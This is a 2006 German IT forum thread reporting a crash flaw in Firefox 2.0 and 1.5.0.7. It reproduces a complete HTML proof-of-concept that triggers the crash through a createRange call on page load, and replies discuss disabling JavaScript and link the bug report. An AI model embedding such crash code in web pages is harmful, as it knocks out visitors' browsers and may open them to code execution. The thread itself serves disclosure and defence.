gnarff
02.11.2006, aktualisiert am 26.03.2012
view5266
view2
0
Goto Top

FLAW in Firefox 2.0 und 1.5.0.7

geschlossengelöstFrageSicherheit
Eine Schwachstelle in den o.g. genannten Versionen des beliebten Firefoxbrowsers ermoeglicht Denial of Service und u.U. die Ausfuehrung von Remote Code.

Hallo liebe Gemeinde!

Einfach mal auf diesen Link klicken, Browser wird sofort abgeschossen.

PoC hier: http://werterxyz.altervista.org/Firefox2Range.htm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
<html>
<head>
<script type="text/javascript">  
function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');  
}
</script>
</head>
<body onload="do_crash()">  
<p>Good bye Firefox!</p>
</body>
</html>
[31.10.2006, 03:14 am, von "xxxx"]

saludos
gnarff
ShareTeilen
Auf Facebook teilen Auf X (Twitter) teilen Auf Reddit teilen Auf Linkedin teilen

Content-ID: 43533

Url: https://administrator.de/forum/flaw-in-firefox-2-0-und-1-5-0-7-43533.html

Ausgedruckt am: 04.04.2025 um 16:04 Uhr

2 Kommentare
Neuester Kommentar
Goto Top
11078
11078 02.11.2006 um 08:14:49 Uhr
Goto Top
Hallo,

nein, stürzt nicht ab. Javascript habe ich nämlich schon lange nicht mehr aktiviert und das kann man nur jedem raten. Beziehungsweise um es differenzierter abzuschalten:

http://www.erweiterungen.de/detail/NoScript/


Gruß,
Tim
gnarff
gnarff 02.11.2006 um 12:54:18 Uhr
Goto Top
hallo tim

Hallo,

nein, stürzt nicht ab. Javascript habe
ich nämlich schon lange nicht mehr
aktiviert und das kann man nur jedem raten.

ja, aber der bug im code bleibt trotzallem unbehoben:
https://bugzilla.mozilla.org/show_bug.cgi?id=358797

Beziehungsweise um es differenzierter
abzuschalten:

http://www.erweiterungen.de/detail/NoScript/

gute idee, diese erweiterung kannte ich noch nicht...

Gruß,
Tim

saludos
gnarff

geschlossengelöstFrageSicherheit
Mehr von gnarffgnarffProbleme mit Thunderbird unter Windowsgnarff - 3 KommentaregnarffNach Umzug zeigt Outlook 2007 nur noch die Header an und die Nachrichten sind ohne Text.gnarff - 1 KommentargnarffSuche Motherboardempfehlunggnarff - 7 KommentaregnarffUmgangsformen im Bereich IT-Sicherheit und Rechtgnarff
Heiß diskutiert
kreuzbergerUbuntu 24 Desktop 64Bit Installation bleibt stehenkreuzberger - 42 Kommentareratzekahl1Batch-Datei mit Admin-Rechten ausführen ohne das Passwort raus zu gebenratzekahl1 - 41 KommentareU08154711Firewall Regeln für TravelrouterU08154711 - 34 KommentarekpunktWelche Applikation will nach 199.59.243.228?kpunkt - 23 KommentareDerWoWussteImport eines p12-Zertifikates auf einen YubikeyDerWoWusste - 20 KommentarekpunktMicrosoft entfernt BypassNRO.cmdkpunkt - 19 Kommentareem-pieVMware: Mindestens 72 Cores für Lizenzierung erforderlichem-pie - 18 KommentaremaddocPlötzlich keinen Sound mehr, neue Soundkarte keine Besserungmaddoc - 17 KommentareanteNopeVeeam Agent on-VM-Backup?anteNope - 16 Kommentaretouro411PFsense Outbound NAT (S-NAT)touro411 - 16 KommentarexpehbamKaufberatung-Empfehlung: Überwachungskamera für eine Hallexpehbam - 15 KommentareMegaadwwhOPNSense, Proxmox, eine weitere Firewall, Ubiquiti, Cisco und NetgearMegaadwwh - 15 Kommentarebm-magicWindows Bootlader Problembm-magic - 15 Kommentare